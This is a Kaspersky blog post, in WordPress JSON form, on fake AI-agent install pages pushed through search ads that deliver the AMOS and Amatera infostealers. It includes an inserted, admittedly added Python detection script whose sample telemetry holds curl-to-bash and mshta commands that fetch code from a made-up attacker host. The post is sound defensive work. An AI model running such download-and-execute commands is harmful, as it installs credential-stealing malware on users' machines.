{"id":55412,"date":"2026-03-12T11:56:27","date_gmt":"2026-03-12T15:56:27","guid":{"rendered":"https:\/\/www.kaspersky.com\/blog\/?p=55412"},"modified":"2026-03-12T11:56:27","modified_gmt":"2026-03-12T15:56:27","slug":"fake-ai-agents-infostealers","status":"publish","type":"post","link":"https:\/\/www.kaspersky.com\/blog\/fake-ai-agents-infostealers\/55412\/","title":{"rendered":"Malware disguised as AI agents"},"content":{"rendered":"<p>We recently <a href=\"https:\/\/www.kaspersky.com\/blog\/share-chatgpt-chat-clickfix-macos-amos-infostealer\/54928\/\" target=\"_blank\" rel=\"noopener nofollow\">discussed<\/a> how malicious actors are spreading the AMOS infostealer for macOS via Google Ads, leveraging a chat with an AI assistant on the actual OpenAI website to host malicious instructions. We decided to dig a little deeper, only to discover several similar malicious campaigns where attackers attempt to slip users malware disguised as popular AI tools through Google Search ads. If the victims are searching for macOS-specific tools, the payload deployed is the very same AMOS; if they\u2019re on Windows, it\u2019s the Amatera infostealer instead. These campaigns use the popular Chinese AI Doubao, the viral AI assistant OpenClaw, or the coding assistant Claude Code as bait. This means such campaigns pose a threat not only to home users but also to organizations.<\/p>\n<p>The reality is that corporate employees are increasingly using coding assistants like Claude Code, and workflow automation agents like OpenClaw. This brings <a href=\"https:\/\/www.kaspersky.com\/blog\/top-agentic-ai-risks-2026\/55184\/\" target=\"_blank\" rel=\"noopener nofollow\">its own set of risks<\/a>, which is why many organizations have yet to officially approve (or pay for) access to such tools. Consequently, some employees take matters into their own hands to find these trendy tools, and head straight to Google. 
They type in a search query and are served a sponsored link leading to a malicious installation guide. Let\u2019s take a closer look at how this attack plays out, using a Claude Code distribution campaign discovered in early March as an example.<\/p>\n<h2>The search query<\/h2>\n<p>A user starts looking for a place to download the Anthropic agent and types something like \u201c<em>Claude Code download<\/em>\u201d into the search bar. The search engine returns a list of links, with \u201csponsored links\u201d (paid advertisements) sitting at the top. One of these ads leads the user to a malicious page featuring fake documentation. Notably, the site itself is hosted on Squarespace, a legitimate website builder, whose good reputation helps the page slip past anti-phishing filters.<\/p>\n<div id=\"attachment_55418\" style=\"width: 854px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/media.kasperskydaily.com\/wp-content\/uploads\/sites\/92\/2026\/03\/12114532\/fake-ai-agents-infostealers-search-results.jpg\"><img decoding=\"async\" aria-describedby=\"caption-attachment-55418\" src=\"https:\/\/media.kasperskydaily.com\/wp-content\/uploads\/sites\/92\/2026\/03\/12114532\/fake-ai-agents-infostealers-search-results.jpg\" width=\"844\" height=\"759\" alt=\"Search result examples\" class=\"wp-image-55418 size-full\"><\/a><p id=\"caption-attachment-55418\" class=\"wp-caption-text\">Search results with ads in Romania and Brazil<\/p><\/div>\n<p>The attackers\u2019 site meticulously mimics the original Claude Code documentation, complete with installation instructions. Just like the real thing, it prompts the user to copy and run a command. Once executed, however, that command installs not an AI agent but malware. 
Essentially, this is just another <a href=\"https:\/\/www.kaspersky.com\/blog\/clickfix-attack-variations\/55340\/\" target=\"_blank\" rel=\"noopener nofollow\">flavor of the ClickFix attack<\/a>, one that has earned its own nickname: <a href=\"https:\/\/pushsecurity.com\/blog\/installfix\/\" target=\"_blank\" rel=\"noopener nofollow\">InstallFix<\/a>.<\/p>\n<div id=\"attachment_55419\" style=\"width: 1342px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/media.kasperskydaily.com\/wp-content\/uploads\/sites\/92\/2026\/03\/12114632\/fake-ai-agents-infostealers-search-fake-site.jpg\"><img decoding=\"async\" aria-describedby=\"caption-attachment-55419\" src=\"https:\/\/media.kasperskydaily.com\/wp-content\/uploads\/sites\/92\/2026\/03\/12114632\/fake-ai-agents-infostealers-search-fake-site.jpg\" width=\"1332\" height=\"661\" alt=\"Malicious website\" class=\"wp-image-55419 size-full\"><\/a><p id=\"caption-attachment-55419\" class=\"wp-caption-text\">Malicious site mimicking installation instructions<\/p><\/div>\n<div id=\"attachment_55420\" style=\"width: 1339px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/media.kasperskydaily.com\/wp-content\/uploads\/sites\/92\/2026\/03\/12114748\/fake-ai-agents-infostealers-search-legitimate-site.jpg\"><img decoding=\"async\" aria-describedby=\"caption-attachment-55420\" src=\"https:\/\/media.kasperskydaily.com\/wp-content\/uploads\/sites\/92\/2026\/03\/12114748\/fake-ai-agents-infostealers-search-legitimate-site.jpg\" width=\"1329\" height=\"703\" alt=\"Claude Code website\" class=\"wp-image-55420 size-full\"><\/a><p id=\"caption-attachment-55420\" class=\"wp-caption-text\">Genuine Claude Code site with installation instructions<\/p><\/div>\n<h2>Malicious payload<\/h2>\n<p>As with the genuine Claude Code installer, the macOS command fetches an installer with the curl command-line utility and runs it. 
In reality, it downloads and runs the AMOS infostealer, previously <a href=\"https:\/\/securelist.com\/kral-amos-vidar-acr-stealers\/114237\/\" target=\"_blank\" rel=\"noopener\">described by our experts<\/a> on Securelist and used in a <a href=\"https:\/\/www.kaspersky.com\/blog\/share-chatgpt-chat-clickfix-macos-amos-infostealer\/54928\/\" target=\"_blank\" rel=\"noopener nofollow\">similar past campaign<\/a>. To the user the command looks like the genuine one, so the URL it fetches from is the detail worth checking.<\/p>\n<p>On Windows, the fake instructions replace the curl command of the genuine installer with the built-in system utility <em>mshta.exe<\/em>, which runs HTML Applications (HTA files) and accepts a remote URL as its argument. The HTA fetched this way deploys the Amatera infostealer, which harvests browser data, crypto-wallet information and files from the user folder, and sends them to a remote server at 144{.}124.235.102.<\/p>\n<h2>How to keep your company safe<\/h2>\n<p>Interest in AI agents continues to grow, and each new tool that gains popularity opens a fresh attack vector. An employee who hunts for an AI tool on their own can expose not only the source code of the projects on their computer, but also secrets, confidential corporate files, and user accounts. Two simple checks defeat this particular trick: open the vendor\u2019s documentation by typing its address directly rather than clicking a sponsored result, and treat any install command that fetches from a domain other than the vendor\u2019s own, or that launches <em>mshta.exe<\/em> with a URL, as hostile.<\/p>\n<p>To prevent this from happening, the first step should be educating employees about these dangers and the tricks used by threat actors. This can be done using our <a href=\"https:\/\/k-asap.com\/en\/?icid=gl_kdailyplacehold_acq_ona_smm__onl_b2b_kasperskydaily_wpplaceholder____kasap___\" target=\"_blank\" rel=\"noopener\">training platform: Kaspersky Automated Security Awareness<\/a>. 
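<\/p>
<p>Awareness training lowers the odds that someone pastes such a command, but the execution pattern itself is also visible in endpoint telemetry. The script below is added here as an example and is not code from the original post or from any Kaspersky product. It classifies process command lines by the two delivery patterns described above: <em>mshta.exe<\/em> launched with a remote URL or an inline script, and a curl or wget one-liner piped straight into a shell. The allowlist of installer hosts, the hostnames and the sample events are assumptions constructed for the example.<\/p>

```python
# Added example, not code from the Kaspersky post: classify process command
# lines by the two InstallFix delivery patterns the article describes.
# Everything below (allowlist, sample events) is constructed for illustration.
import re

# Installer hosts an organisation has vetted. Assumption for the example:
# the genuine Claude Code installer is fetched from claude.ai.
ALLOWED_INSTALLER_HOSTS = {'claude.ai'}

URL_RE = re.compile(r'https?://([^/ ]+)', re.IGNORECASE)
# mshta as the launched image, with or without the .exe suffix or a path
MSHTA_RE = re.compile(r'(^|[/ ])mshta([.]exe)?( |$)', re.IGNORECASE)
INLINE_SCRIPT_RE = re.compile(r'(vbscript|javascript):', re.IGNORECASE)
DOWNLOADER_RE = re.compile(r'(^| )(curl|wget)( |$)', re.IGNORECASE)
# a pipe whose right-hand side is a shell, optionally via sudo
PIPE_TO_SHELL_RE = re.compile(r'[|] *(sudo +)?(bash|sh|zsh)( |$)', re.IGNORECASE)


def classify_command(cmdline):
    # Returns (technique, verdict); verdict is one of allow, review, block.
    hosts = [m.group(1).lower() for m in URL_RE.finditer(cmdline)]
    unknown_hosts = [h for h in hosts if h not in ALLOWED_INSTALLER_HOSTS]

    if MSHTA_RE.search(cmdline):
        if hosts:
            # mshta fetching an HTA over the network: the Windows variant
            return ('mshta-remote-hta', 'block')
        if INLINE_SCRIPT_RE.search(cmdline):
            return ('mshta-inline-script', 'block')
        return ('mshta', 'review')

    if DOWNLOADER_RE.search(cmdline) and PIPE_TO_SHELL_RE.search(cmdline):
        # curl ... | bash from a vetted host is how the genuine installer
        # works, so that case is only flagged for review; any other host,
        # or no parseable host at all, is blocked.
        if unknown_hosts or not hosts:
            return ('download-pipe-shell', 'block')
        return ('download-pipe-shell', 'review')

    return (None, 'allow')


def scan(events):
    # events: iterable of (hostname, cmdline) pairs, e.g. the CommandLine field
    # of process-creation telemetry. Returns only the non-allow verdicts.
    alerts = []
    for hostname, cmdline in events:
        technique, verdict = classify_command(cmdline)
        if verdict != 'allow':
            alerts.append({'host': hostname, 'technique': technique,
                           'verdict': verdict, 'cmdline': cmdline})
    return alerts


# Constructed sample telemetry; the docs-claude-install.example host is made up.
SAMPLE_EVENTS = [
    ('mac-dev-01', 'curl -fsSL https://claude.ai/install.sh | bash'),
    ('mac-dev-02', 'curl -fsSL https://docs-claude-install.example/install.sh | bash'),
    ('win-dev-03', 'mshta https://docs-claude-install.example/setup.hta'),
    ('win-dev-04', 'npm install -g @anthropic-ai/claude-code'),
]

if __name__ == '__main__':
    for alert in scan(SAMPLE_EVENTS):
        print(alert['host'], alert['verdict'], alert['technique'], alert['cmdline'])
```

<p>The verdict is deliberately two-tiered: a curl-to-shell one-liner that fetches from a vetted vendor host is flagged for review, because that is exactly what the genuine Claude Code installer looks like, while the same pattern fetching from any other host, or any <em>mshta.exe<\/em> launch with a URL, is blocked outright. Feed it the CommandLine field of process-creation events (Sysmon event ID 1, or the equivalent from an EDR) rather than whatever is on the user\u2019s clipboard, since the command is what actually ran.<\/p>
<p>Detection of this kind complements the training platform mentioned above rather than replacing it. 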
Incidentally, it includes a specialized lesson on the use of AI in corporate environments.<\/p>\n<p>Additionally, we recommend protecting all corporate devices with <a href=\"https:\/\/www.kaspersky.com\/next?icid=gl_kdailyplacehold_acq_ona_smm__onl_b2b_kdaily_wpplaceholder_sm-team___knext____a8c0f733e524af27\" target=\"_blank\" rel=\"noopener nofollow\">proven cybersecurity solutions<\/a>.<\/p>\n<p>We also suggest checking out our previously published article on <a href=\"https:\/\/www.kaspersky.com\/blog\/shadow-ai-3-policies\/54252\/\" target=\"_blank\" rel=\"noopener nofollow\">three approaches to minimizing the risks of using shadow AI<\/a>.<\/p>\n<input type=\"hidden\" class=\"category_for_banner\" value=\"kaspersky-next\">\n","protected":false},"excerpt":{"rendered":"<p>Threat actors are promoting pages containing malicious instructions for installing AI agents intended for workflow automation. <\/p>\n","protected":false},"author":2787,"featured_media":55421,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[1999,3051,3052],"tags":[1140,4657,1946,36],"class_list":{"0":"post-55412","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-business","8":"category-enterprise","9":"category-smb","10":"tag-ai","11":"tag-infostealers","12":"tag-macos","13":"tag-malware-2"},"hreflang":[{"hreflang":"x-default","url":"https:\/\/www.kaspersky.com\/blog\/fake-ai-agents-infostealers\/55412\/"},{"hreflang":"en-in","url":"https:\/\/www.kaspersky.co.in\/blog\/fake-ai-agents-infostealers\/30270\/"},{"hreflang":"en-ae","url":"https:\/\/me-en.kaspersky.com\/blog\/fake-ai-agents-infostealers\/25346\/"},{"hreflang":"ar","url":"https:\/\/me.kaspersky.com\/blog\/fake-ai-agents-infostealers\/13273\/"},{"hreflang":"en-gb","url":"https:\/\/www.kaspersky.co.uk\/blog\/fake-ai-agents-infostealers\/30141\/"},{"hreflang":"es-mx","url"
:"https:\/\/latam.kaspersky.com\/blog\/fake-ai-agents-infostealers\/29065\/"},{"hreflang":"es","url":"https:\/\/www.kaspersky.es\/blog\/fake-ai-agents-infostealers\/31946\/"},{"hreflang":"it","url":"https:\/\/www.kaspersky.it\/blog\/fake-ai-agents-infostealers\/30549\/"},{"hreflang":"ru","url":"https:\/\/www.kaspersky.ru\/blog\/fake-ai-agents-infostealers\/41448\/"},{"hreflang":"tr","url":"https:\/\/www.kaspersky.com.tr\/blog\/fake-ai-agents-infostealers\/14390\/"},{"hreflang":"fr","url":"https:\/\/www.kaspersky.fr\/blog\/fake-ai-agents-infostealers\/23740\/"},{"hreflang":"pt-br","url":"https:\/\/www.kaspersky.com.br\/blog\/fake-ai-agents-infostealers\/24828\/"},{"hreflang":"de","url":"https:\/\/www.kaspersky.de\/blog\/fake-ai-agents-infostealers\/33311\/"},{"hreflang":"ru-kz","url":"https:\/\/blog.kaspersky.kz\/fake-ai-agents-infostealers\/30395\/"},{"hreflang":"en-au","url":"https:\/\/www.kaspersky.com.au\/blog\/fake-ai-agents-infostealers\/36025\/"},{"hreflang":"en-za","url":"https:\/\/www.kaspersky.co.za\/blog\/fake-ai-agents-infostealers\/35684\/"}],"acf":[],"banners":"","maintag":{"url":"https:\/\/www.kaspersky.com\/blog\/tag\/infostealers\/","name":"infostealers"},"_links":{"self":[{"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/posts\/55412","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/users\/2787"}],"replies":[{"embeddable":true,"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/comments?post=55412"}],"version-history":[{"count":3,"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/posts\/55412\/revisions"}],"predecessor-version":[{"id":55422,"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/posts\/55412\/revisions\/55422"}],"wp:featuredmedia":[{"embeddable":true,"href":"http
s:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/media\/55421"}],"wp:attachment":[{"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/media?parent=55412"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/categories?post=55412"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/tags?post=55412"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}